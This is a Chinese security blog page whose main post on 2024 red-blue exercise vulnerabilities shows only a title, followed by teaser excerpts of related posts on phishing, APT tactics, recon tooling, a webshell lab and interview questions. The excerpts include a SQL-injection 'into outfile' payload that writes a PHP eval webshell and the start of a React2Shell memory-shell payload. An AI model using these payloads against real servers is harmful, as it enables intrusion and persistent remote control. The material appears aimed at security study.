亚信安全2024攻防演练高危漏洞合集
发表于|更新于|安全
|总字数:21|阅读时长:1分钟|浏览量:
亚信安全2024攻防演练高危漏洞合集
预览
文章作者: Mo Shang
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 M's Blog!
相关推荐
2024-09-15
解密希拉里”邮件门”中鱼叉钓鱼攻击的技术细节
Part1 前言大家好,我是ABC_123。近几年无论是APT攻击还是日常各种攻防比赛,邮件钓鱼、鱼叉攻击一直都是常用的攻击手段,其中最出名且影响最大的实战案例莫过于“希拉里邮件门事件”,直接影响了美国总统大选结果,导致希拉里竞选总统失败。尽管这一事件几乎人人皆知,但其中涉及的鱼叉钓鱼攻击的技术细节却鲜有文章详细描述。经过翻阅大量资料,ABC_123今天为大家分析这个重要的鱼叉钓鱼邮件攻击案例,希望能够提升大家防范钓鱼邮件的意识。 注:文末提到的Xkeyscore关键得分系统请参考ABC_123的这篇原创文章《第100篇:美国NSA全球个人信息检索系统XKeyscore关键得分的介绍》,有详细介绍。 Part2 技术研究过程 希拉里邮件门事件介绍 “希拉里邮件门”事件最初指的是希拉里·克林顿在担任美国国务卿期间,使用私人电子邮件服务器处理与政府工作相关的邮件。随后在2016年10月7日,在希拉里竞选总统期间,希拉里总统竞选团队的负责人约翰·波德斯塔 (John Podesta) 的私人Gmail邮箱密码被某APT组织使用鱼叉攻击窃取,导致2万多封邮件被窃取,部分内容是绝密的...
2025-12-05
React2Shell的一些payload
React2Shell的一些payload 免责声明 本文的知识内容,仅供网络安全从业人员学习参考 用于已获得合法授权的网站测试,请勿用于其它用途 请勿使用本文中的工具、技术及资料, 对任何未经授权的网站、系统进行测试, 否则,所造成的直接或间接后果, 均由您自行承担 内存马12345678910111213{ "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "(async()=>{con...
2024-07-20
ARL资产侦察灯塔系统搭建
ARL资产侦察灯塔系统搭建请大家点点start 项目地址曾哥 项目地址msmoshang Docker项目地址honmashironeko/本间白猫 现在此项目支持Centos7 and 8 和 Ubuntu 20.04的源码安装,并支持Docker安装 12345两个脚本二选一即可wget https://raw.githubusercontent.com/Aabyss-Team/ARL/master/misc/setup-arl.shwget https://raw.githubusercontent.com/msmoshang/ARL/master/misc/setup-arl.shchmod +x setup-arl.sh./setup-arl.sh 其他操作系统建议选择Docker安装,Centos 7 and 8和Ubuntu20.04建议选择源码安装 安装完成打开 IP:5003端口即可 并且添加了新的指纹添加脚本,集成了换源操作,并将添加指纹独立出去,减少问题的发生,源码安装及Docker安装都支持国内外安装 项目地址msmoshang/A...
2024-04-04
记一次国护面试题
记一次国护面试题先看简历,然后根据你的项目经验去先问一些针对性问题,这些就自由回答了。 问:绕过白名单的方式 答: 100截断 问:00截断应该写在哪里 答: 1放在文件上传的路径后面 问:你一般如何用sql写入webshell呢 答: 12345678910常见的仅适用于联合注入。union 跟 select into outfileunion select 1,"<?php @eval($_POST['xxxx']);?>",3 into outfile 'D:\\www\\WWWroot\\hack.php'或者写入到表,然后在导出为文件写入到日志里盲注或者报错常用分隔符注入into outfile 'D:\\www\\WWWroot\\hack.php' lines terminated by '<?php @eval($_POST['xxxx']);?>' 还有一些这些大佬blog写的更全可以学习 SQL注入写入websh...
2024-05-28
玄机靶场--1.webshell查杀
玄机靶场–1.webshell查杀我们先启动环境 开启环境后会有IP地址 账号密码就在概述里面 使用SSH链接靶机,然后查看开启的端口 端口显示有80,22,3306,有web服务 然后查找目录,进入根目录用 1find -name index.html 查找到在/var/www/html目录下 现在本地靶机进行河马webshell扫描 然后发现扫描不到,只有一个一句话木马,无法进行外网访问,我们另起他法,将目录打包到本地 然后在在线扫描再试试看(其实我本地杀软已经报毒了,但是还是在河马在线扫描进行了一次扫描)地址链接 一共扫描出5个结果 1、黑客webshell里面的flag一个疑似PHP命令执行webshell,一个是PHP命令执行webshell 我们先打开这个比较确定的 里面有一串注释就是webshell里面的flag了 2、黑客使用的什么工具的shell github地址的md5然后上面gz.php代码一眼望去—哥斯拉(具体请看别的大佬的webshell管理工具分析分析) 1234567891011121314151...
2023-05-27
越南海莲花APT针对中国大陆的邮件钓鱼技战术手法总结
Part1 前言**大家好,我是ABC_123,公众号正式更名为”希潭实验室”,敬请关注。**去年ABC_123跟朋友一起吃饭,听一个朋友兴奋地说道“我们抓到了一个海莲花!”,于是便引起了我对海莲花APT组织的兴趣。本期就分析一下这个长期对我国进行网络攻击的APT组织“海莲花”,又名APT32、OceanLotus或APT-C-00,该组织普遍认为由越南政府支持,至少从2012年4月份开始,长期对中国及其它国家的政府机构、科研机构、大型国企、能源行业、金融行业和重要私企等进行网络攻击,窃取机密情报或技术资料。 注:对于本篇文章,ABC_123参考了大量由微步威胁情报中心、360安全公司、奇安信安全公司、腾讯御见威胁情报中心、安天公司、看雪论坛等公开发布的各种文章及分析报告,在此谢过。从2020年开始,海莲花开始逐步减少常用的鱼叉式钓鱼入侵,转向漏洞挖掘、水坑攻击甚至是攻击上游供应链,这也是为什么这两年出现在公众视野的海莲花样本大幅度减少的原因。 海莲花APT组织常用的攻击手段就是“鱼叉攻击”及“水坑攻击”,本篇文章着重介绍一下海莲花的鱼叉攻击的钓鱼邮件手法,使大家对于海莲花APT...
公告
海不择细流,故能成其大;山不拒细壤,方能就其高。一个希望在网络安全有建树的菜狗.✍️
